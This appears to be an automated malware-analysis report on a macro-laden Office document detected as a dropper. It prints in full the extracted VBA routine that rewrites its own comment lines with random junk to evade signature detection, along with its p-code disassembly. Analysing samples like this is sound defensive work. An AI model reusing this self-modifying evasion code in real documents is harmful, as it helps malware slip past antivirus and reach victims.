Verdict: MALICIOUS
Risk Score: 80

Malware Insights
MITRE ATT&CK: T1059.005 (Visual Basic)
The sample is identified as malicious by ClamAV and contains VBA macros. The macro code deletes existing comment lines from its own code module and inserts new comment lines made of random uppercase letters, suggesting an attempt at obfuscation or anti-analysis (changing the file's hash and defeating signature matching on the macro text). While no direct payload or network communication is evident from the provided script, this self-modifying behavior is characteristic of droppers or loaders.
Heuristics (2)
- ClamAV: Doc.Dropper.Agent-1500979 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-1500979
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3346 bytes | caf641eddea2a068eb49dac2fc8b62a69fe3732f8483feff1868ee0757ba831a |
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Modul 1"
Private Sub RndmJnkr()
    For V1 = 1 To ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
        V2 = Mid(ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(V1, 1), 1, 1)
        If V2 = "'" Then ThisDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines V1, 1
    Next V1
    For V3 = 1 To Int(Rnd() * 49 + 1)
        V4 = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
        V5 = Int(Rnd() * V4 + 1)
        V6 = Int(Rnd() * 99 + 1)
        For V7 = 1 To V6
            V8 = V8 + Chr$(Int((90 - 65 + 1) * Rnd + 65))
        Next V7
        ThisDocument.VBProject.VBComponents.Item(1).CodeModule.InsertLines V5, "'" & V8
        V8 = ""
    Next V3
End Sub

' Processing file: /opt/analyzer/scan_staging/0e35ce38c755483f973442b45ca06092.bin
' ===============================================================================
' Module streams:
'   Macros/VBA/ThisDocument - 903 bytes
'   Macros/VBA/Modul 1 - 1740 bytes
'
' P-code disassembly (one comment line per source line; opcodes in execution order):
' Line #0:  FuncDefn (Private Sub RndmJnkr())
' Line #1:  StartForVariable, Ld V1, EndForVariable, LitDI2 0x0001, LitDI2 0x0001, Ld ThisDocument, MemLd VBProject, MemLd VBComponents, ArgsMemLd Item 0x0001, MemLd CodeModule, MemLd CountOfLines, For
' Line #2:  Ld V1, LitDI2 0x0001, LitDI2 0x0001, Ld ThisDocument, MemLd VBProject, MemLd VBComponents, ArgsMemLd Item 0x0001, MemLd CodeModule, ArgsMemLd Lines 0x0002, LitDI2 0x0001, LitDI2 0x0001, ArgsLd Mid$ 0x0003, St V2
' Line #3:  Ld V2, LitStr 0x0001 "'", Eq, If, BoSImplicit, Ld V1, LitDI2 0x0001, LitDI2 0x0001, Ld ThisDocument, MemLd VBProject, MemLd VBComponents, ArgsMemLd Item 0x0001, MemLd CodeModule, ArgsMemCall DeleteLines 0x0002, EndIf
' Line #4:  StartForVariable, Ld V1, EndForVariable, NextVar
' Line #5:  StartForVariable, Ld V3, EndForVariable, LitDI2 0x0001, ArgsLd Rnd 0x0000, LitDI2 0x0031, Mul, LitDI2 0x0001, Add, FnInt, For
' Line #6:  LitDI2 0x0001, Ld ThisDocument, MemLd VBProject, MemLd VBComponents, ArgsMemLd Item 0x0001, MemLd CodeModule, MemLd CountOfLines, St V4
' Line #7:  ArgsLd Rnd 0x0000, Ld V4, Mul, LitDI2 0x0001, Add, FnInt, St V5
' Line #8:  ArgsLd Rnd 0x0000, LitDI2 0x0063, Mul, LitDI2 0x0001, Add, FnInt, St V6
' Line #9:  StartForVariable, Ld V7, EndForVariable, LitDI2 0x0001, Ld V6, For
' Line #10: Ld V8, LitDI2 0x005A, LitDI2 0x0041, Sub, LitDI2 0x0001, Add, Paren, Ld Rnd, Mul, LitDI2 0x0041, Add, FnInt, ArgsLd Chr$ 0x0001, Add, St V8
' Line #11: StartForVariable, Ld V7, EndForVariable, NextVar
' Line #12: Ld V5, LitStr 0x0001 "'", Ld V8, Concat, LitDI2 0x0001, Ld ThisDocument, MemLd VBProject, MemLd VBComponents, ArgsMemLd Item 0x0001, MemLd CodeModule, ArgsMemCall InsertLines 0x0002
' Line #13: LitStr 0x0000 "", St V8
' Line #14: StartForVariable, Ld V3, EndForVariable, NextVar
' Line #15: EndSub
```